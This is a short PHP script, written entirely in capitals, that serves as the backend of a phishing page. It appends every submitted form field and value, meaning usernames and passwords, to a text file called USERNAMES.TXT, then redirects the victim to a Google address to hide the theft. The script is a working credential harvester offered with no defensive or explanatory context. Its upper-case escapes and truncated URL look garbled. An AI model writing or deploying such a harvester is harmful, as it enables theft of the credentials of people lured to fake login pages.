<?PHP
HEADER('LOCATION:HTTP://WWW.GOOGLE/');
$HANDLE=FOPEN("USERNAMES.TXT","A");
FOREACH($_POST AS $VARIABLE =>$VALUE){
FWRITE($HANDLE,$VARIABLE);
FWRITE($HANDLE,"=");
FWRITE($HANDLE,$VALUE);
FWRITE($HANDLE,"\R\N");
}
FWRITE($HANDLE,"\R\N");
FCLOSE($HANDLE);
EXIT;
?>
